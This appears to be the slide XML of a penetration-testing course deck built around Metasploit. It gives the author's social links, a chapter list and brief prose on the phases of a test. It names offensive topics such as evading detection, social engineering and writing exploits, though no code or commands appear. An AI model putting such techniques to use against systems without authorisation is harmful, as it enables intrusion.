                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You can Ask Me ON ? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67D5F57-39B4-1D3E-20D9-DFCC19BBBCF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381220" y="1552793"/>
            <a:ext cx="10227686" cy="5038530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Facebook : https://www.facebook.com/m3lomatthephone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>My YouTube Chanel : https://www.youtube.com/c/m3lomatthephone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>M3lomat the phone 2 :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="" altLang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://www.youtube.com/channel/UCixopZbFBzdYKk2qsZLsRCA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>M3lomat  Electric : https://www.youtube.com/channel/UCGnXhX2E_MaGYOY8kyOowbQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Instagram : https://instagram.com/mena.m.rushdy?igshid=1xg5sxvjtek7i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>LinkedIn : https://www.linkedin.com/in/mina-magdy-38362b1b6/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Facebook Group : https://www.facebook.com/groups/391033085092937</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C40116-A18C-BFA9-A361-6A8FF29CEA7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8542017" y="3703220"/>
            <a:ext cx="3604518" cy="3200400"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51551BA7-59ED-5D8F-6DC8-C83008E05F93}"/>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3A2C7582-6128-1887-9ED2-3D618BB74325}"/>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7AD59046-C474-2F69-2ECA-5D77A4FFEE03}"/>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48F3DF76-3919-E83A-9231-61CB424D62DA}"/>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3" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E4F0E2-B18F-3CC9-C2AE-45DFC5604584}"/>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5D9C1D03-27DA-3236-AECB-22877A43F00C}"/>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E2F60604-C412-2488-1562-69E25EB84713}"/>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FCA64FC0-116E-BD2B-65B3-6031DE2F6A6E}"/>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84AA13DE-F9A6-9594-67EF-9DD12DCD8FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8677289" y="3871498"/>
            <a:ext cx="3224358" cy="1968658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7900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498DBA-4035-BB31-9F3D-DD68FE27A8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-109536"/>
            <a:ext cx="8072227" cy="955374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What’s in the Course ?</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{535D601C-963D-E03D-96E0-87E45BA5A3ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="845838"/>
            <a:ext cx="11863137" cy="5909310"/>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latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 1 “The Absolute Basics of Penetration Testing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 2 “Metasploit Basics”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 3 “Intelligence Gathering” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 4 “Vulnerability Scanning” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 5 “The Joy of Exploitation”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 6 “Meterpreter”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 7 “Avoiding Detection” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 8 “Exploitation Using Client-Side Attacks”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>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fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 9 “Metasploit Auxiliary Modules”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 10 “The Social-Engineer Toolkit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 11 “Fast-Track”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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45662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498DBA-4035-BB31-9F3D-DD68FE27A8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-109536"/>
            <a:ext cx="8072227" cy="955374"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What’s in the Course ?</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{535D601C-963D-E03D-96E0-87E45BA5A3ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272716" y="845838"/>
            <a:ext cx="11863137" cy="3139321"/>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rPr>
              <a:t>Chapter 12 “Karmetasploit” shows you how to leverage Karmetasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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rPr>
              <a:t>Chapter 13 “Building Your Own Modules”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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rPr>
              <a:t>Chapter 14 “ Creating Your Own Exploits”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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rPr>
              <a:t>Chapter 15 “Porting Exploits to the Metasploit Framework”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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rPr>
              <a:t>Chapter 16 “Meterpreter Scripting” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 17 “Simulated Penetration Test”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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305412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871773" y="726152"/>
            <a:ext cx="10448454" cy="45719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B A S I C S</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  O F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P E N E T R A T I O N  T E S T I N G </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB815031-F639-E13E-2203-717F283BF9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1624263"/>
            <a:ext cx="22981612" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelligence Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ntelligence gathering phase, you will gather any information you can about the organization you are attacking by using 	social-media networks, Google hacking, foot printing the target, and so on. One of the most important skill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Having identified the most viable attack methods, you need to consider how</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	you will access the target. During vulnerability analysis, you combine</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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploitation is probably one of the most glamorous parts of a penetration test,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>yet it is often done with brute force rather than with precision. An exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>should be performed only when you know almost beyond a shadow of a doubt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>that a particular exploit will be successful</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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reporting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reporting is by far the most important element of a penetration test. You will</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
